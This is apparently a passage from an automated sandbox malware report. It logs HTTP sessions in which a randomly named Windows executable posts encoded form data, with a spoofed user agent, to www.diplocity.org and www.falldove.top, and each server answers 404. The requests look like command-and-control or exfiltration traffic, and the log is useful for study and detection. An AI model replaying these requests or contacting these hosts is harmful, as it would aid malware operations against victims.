                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px;
                                          May 27, 2024 12:43:57.961033106 CEST224INData Raw: 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73
                                          Data Ascii: margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;
                                          May 27, 2024 12:43:57.961052895 CEST1236INData Raw: 0a 7d 0a 23 63 61 75 73 65 20 6c 69 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 7d 0a 68 33 20 7b 0a 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62
                                          Data Ascii: }#cause li { color: #666;}h3 { letter-spacing: 1px; font-weight: bold; padding: 0;}#white_box { margin: 15px auto 0; background-color: white;}/* ==================== ======================= *
                                          May 27, 2024 12:43:57.961071968 CEST358INData Raw: a3 3c 2f 70 3e 0a 20 20 20 20 3c 68 33 3e b0 ca b2 bc a4 ce a4 e8 a4 a6 a4 ca b8 b6 b0 f8 a4 ac b9 cd a4 a8 a4 e9 a4 ec a4 de a4 b9 a1 a3 3c 2f 68 33 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 77 68 69 74 65 5f 62 6f 78 22 3e 0a 20 20 20 20 20
                                          Data Ascii: </p> <h3></h3> <div id="white_box"> <div id="cause"> <ul> <li></li> <li>UR


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.54973278.142.211.199806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:03.019870043 CEST759OUTPOST /l1oh/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.diplocity.org
                                          Origin: http://www.diplocity.org
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.diplocity.org/l1oh/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 50 4a 4c 61 31 67 31 76 6d 74 39 6f 6a 36 2b 66 77 57 74 34 6b 30 4a 2b 41 74 4c 63 79 51 2f 6a 5a 51 41 33 66 4c 36 4f 51 59 72 48 74 6d 41 7a 71 64 57 46 32 37 75 51 34 54 41 70 65 51 2b 6a 79 70 34 38 38 47 77 42 62 57 6f 55 61 7a 59 47 53 78 4a 65 69 4b 7a 61 78 30 69 33 66 2b 32 67 6e 63 4e 74 61 68 44 57 44 4f 51 7a 71 71 51 51 6b 47 6c 55 30 58 4d 68 37 64 53 6f 41 36 69 30 51 73 49 45 68 79 55 66 54 4f 46 31 2b 6e 2b 4e 6e 6a 39 51 4a 52 51 7a 5a 33 65 64 75 6d 79 6c 6e 6e 75 52 42 6d 61 47 6b 70 6a 77 35 50 37 39 37 74 75 6a 43 41 34 46 65 2f 6c 63 37 4b 4a 35 54 4d 6d 46 51 74 67 3d
                                          Data Ascii: 4b34ht=PJLa1g1vmt9oj6+fwWt4k0J+AtLcyQ/jZQA3fL6OQYrHtmAzqdWF27uQ4TApeQ+jyp488GwBbWoUazYGSxJeiKzax0i3f+2gncNtahDWDOQzqqQQkGlU0XMh7dSoA6i0QsIEhyUfTOF1+n+Nnj9QJRQzZ3edumylnnuRBmaGkpjw5P797tujCA4Fe/lc7KJ5TMmFQtg=
                                          May 27, 2024 12:44:03.742676973 CEST492INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 27 May 2024 10:44:03 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.54973378.142.211.199806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:05.556211948 CEST779OUTPOST /l1oh/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.diplocity.org
                                          Origin: http://www.diplocity.org
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.diplocity.org/l1oh/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 50 4a 4c 61 31 67 31 76 6d 74 39 6f 78 4c 75 66 32 33 74 34 30 6b 4a 2f 46 74 4c 63 37 77 2f 6e 5a 51 4d 33 66 4b 2b 65 52 72 50 48 74 45 59 7a 72 63 57 46 78 37 75 51 32 7a 41 57 44 41 2b 6f 79 70 30 65 38 44 51 42 62 57 38 55 61 33 51 47 56 47 64 52 68 36 7a 63 70 45 69 78 62 2b 32 67 6e 63 4e 74 61 68 58 38 44 4f 49 7a 70 62 67 51 6c 6e 6c 58 39 33 4d 69 2b 74 53 6f 45 36 6a 63 51 73 4a 30 68 33 4d 6c 54 4c 42 31 2b 6c 6d 4e 6d 78 56 58 41 52 51 31 54 58 66 4b 70 54 76 73 70 30 4f 46 45 46 7a 47 6c 61 37 64 34 35 57 58 68 50 6d 4c 52 67 55 39 4f 73 74 72 71 36 6f 51 4a 76 32 31 4f 36 30 57 4c 6a 54 38 78 46 44 6e 34 6f 61 47 42 41 4c 50 66 6f 2b 6f
                                          Data Ascii: 4b34ht=PJLa1g1vmt9oxLuf23t40kJ/FtLc7w/nZQM3fK+eRrPHtEYzrcWFx7uQ2zAWDA+oyp0e8DQBbW8Ua3QGVGdRh6zcpEixb+2gncNtahX8DOIzpbgQlnlX93Mi+tSoE6jcQsJ0h3MlTLB1+lmNmxVXARQ1TXfKpTvsp0OFEFzGla7d45WXhPmLRgU9Ostrq6oQJv21O60WLjT8xFDn4oaGBALPfo+o
                                          May 27, 2024 12:44:06.289916039 CEST492INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 27 May 2024 10:44:05 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.54973478.142.211.199806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:08.753509998 CEST1796OUTPOST /l1oh/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.diplocity.org
                                          Origin: http://www.diplocity.org
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.diplocity.org/l1oh/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 50 4a 4c 61 31 67 31 76 6d 74 39 6f 78 4c 75 66 32 33 74 34 30 6b 4a 2f 46 74 4c 63 37 77 2f 6e 5a 51 4d 33 66 4b 2b 65 52 72 48 48 75 31 34 7a 74 2f 75 46 77 37 75 51 2b 54 41 54 44 41 2b 31 79 70 73 61 38 44 55 72 62 56 45 55 41 56 49 47 55 7a 68 52 32 4b 7a 63 31 30 69 77 66 2b 32 70 6e 63 63 6b 61 68 48 38 44 4f 49 7a 70 5a 34 51 6a 32 6c 58 37 33 4d 68 37 64 54 70 41 36 69 78 51 74 73 4d 68 33 41 50 54 34 4a 31 2b 46 32 4e 6c 45 4a 58 50 52 51 4e 51 58 66 43 70 54 72 76 70 30 53 7a 45 46 33 38 6c 61 44 64 31 73 62 4c 37 2b 6e 63 46 79 63 47 41 4e 70 30 2f 38 34 47 41 65 71 5a 48 64 55 4a 4f 52 54 7a 77 53 66 4b 79 4b 50 77 64 31 37 58 53 2b 76 70 6b 58 2f 55 79 37 70 76 5a 6f 39 44 53 44 33 65 5a 2f 71 7a 68 61 44 45 4a 57 72 42 48 65 33 56 72 78 50 6d 61 66 54 6a 2b 33 54 72 63 53 52 43 68 42 41 57 54 65 68 48 67 4a 65 42 70 38 2f 45 4f 4e 4d 64 32 47 68 35 70 70 63 4d 51 47 38 58 6d 31 35 61 76 6c 76 6d 4f 35 37 41 7a 64 47 42 69 39 47 48 74 50 47 31 79 4f 75 71 6a 68 68 [TRUNCATED]
                                          Data Ascii: 4b34ht=PJLa1g1vmt9oxLuf23t40kJ/FtLc7w/nZQM3fK+eRrHHu14zt/uFw7uQ+TATDA+1ypsa8DUrbVEUAVIGUzhR2Kzc10iwf+2pncckahH8DOIzpZ4Qj2lX73Mh7dTpA6ixQtsMh3APT4J1+F2NlEJXPRQNQXfCpTrvp0SzEF38laDd1sbL7+ncFycGANp0/84GAeqZHdUJORTzwSfKyKPwd17XS+vpkX/Uy7pvZo9DSD3eZ/qzhaDEJWrBHe3VrxPmafTj+3TrcSRChBAWTehHgJeBp8/EONMd2Gh5ppcMQG8Xm15avlvmO57AzdGBi9GHtPG1yOuqjhh0nWLfviJKoUaQ736uKQFtWUcdqPlYW+1dOFwnTa7Io/5wHiXA9Nt7OztUQ1b+ILypllaAb4TROs99D4fWReqddnoSeO6nZHcwUciZbYbftEYxl0mb6K07H9yVpkTPob0bMlTm4A0dlZjlMKNecr6w8F7j/EFckrbGN1LswSTl2AO1jLVsXttSzrq9MbUrV45NIuC7g5f+bA0x07LbsaeD5DsUt/ojZwt2bRaM+brIaba0gJTWawT2Zi6QAbk6SgpkwiCDfweS1dnpK3BFKIcOq6Vl5CEwTIWK+i20+JU+M0zRL18UUpUV9gMOi833BkjCwhssJwWQoCpKwc6NQiQLrsWwI2Xo+ZZBrAKSjKEU1QY2/x9pIDssH+5ubdoXfMCaRiNRp+GEXb/uPZrEiXbPjavoziGsKUTyaIWLfqrwVMZJXL1my/aqCEGYKZRzHpd/TpzR4TJkSObryjPPqOB/il1QQzSRYzeDuMhbWo8zWhtfur5Sl4caCuxrx+Y10BDFlrv2NUB4JAODmsgy+BoGMGN6rPcKEZmIBissW6qyhwsLGvzkN1QlSf3CxeMDFWLlDKInOs/ETYrU7unX2++6hrhCCcjYvKOr/b0cu938t4pcnyKQz7HeeDfSfPvbTJP3GN8SeDtV5KJgMOF3miq2wcHmqfB9etMD4 [TRUNCATED]
                                          May 27, 2024 12:44:09.485321999 CEST492INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 27 May 2024 10:44:09 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.54973578.142.211.199806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:11.323120117 CEST504OUTGET /l1oh/?4b34ht=CLj62WE97PINjru9/2Ua0S4wJ+6clgTBZzFqYLe+Zb/mrkE/j+GqxKOEwyxDIhmnv5tawjcWYXQUR2YOfRR5ys/k8mvsQ8S8w9omXjrMO8RJvp8vgkkqsEYyw/rrHr7WOA==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.diplocity.org
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:12.068820953 CEST492INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 27 May 2024 10:44:11 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.54973666.29.149.46806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:17.109657049 CEST756OUTPOST /ewqf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.falldove.top
                                          Origin: http://www.falldove.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.falldove.top/ewqf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 70 61 36 42 54 7a 30 56 65 6d 76 75 39 57 6b 79 71 63 35 6c 44 6c 39 6d 71 45 6b 79 53 71 67 65 67 36 43 55 58 52 44 4d 66 4f 64 65 57 30 43 59 52 72 4b 7a 6c 7a 73 69 56 56 61 2b 44 62 51 69 78 34 72 34 6a 34 47 5a 67 35 77 45 2f 37 33 50 58 54 2b 6d 4a 5a 4e 66 32 61 61 53 30 35 77 61 58 6c 78 58 70 67 52 75 76 2f 31 39 79 49 41 4f 4b 45 63 6b 48 33 76 4d 37 4f 43 4e 77 62 6e 62 75 4d 6e 58 54 6f 6c 64 69 51 31 70 56 63 4b 68 5a 52 42 6b 35 79 32 54 71 72 68 49 51 6e 2f 42 70 6f 53 6e 5a 6d 44 4a 66 65 35 6f 63 63 73 50 4f 4c 4e 46 4c 73 52 74 48 39 45 36 68 78 42 39 30 54 46 56 5a 31 6f 3d
                                          Data Ascii: 4b34ht=pa6BTz0Vemvu9Wkyqc5lDl9mqEkySqgeg6CUXRDMfOdeW0CYRrKzlzsiVVa+DbQix4r4j4GZg5wE/73PXT+mJZNf2aaS05waXlxXpgRuv/19yIAOKEckH3vM7OCNwbnbuMnXToldiQ1pVcKhZRBk5y2TqrhIQn/BpoSnZmDJfe5occsPOLNFLsRtH9E6hxB90TFVZ1o=
                                          May 27, 2024 12:44:17.711313009 CEST637INHTTP/1.1 404 Not Found
                                          Date: Mon, 27 May 2024 10:44:17 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.54973766.29.149.46806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:19.641788960 CEST776OUTPOST /ewqf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.falldove.top
                                          Origin: http://www.falldove.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.falldove.top/ewqf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
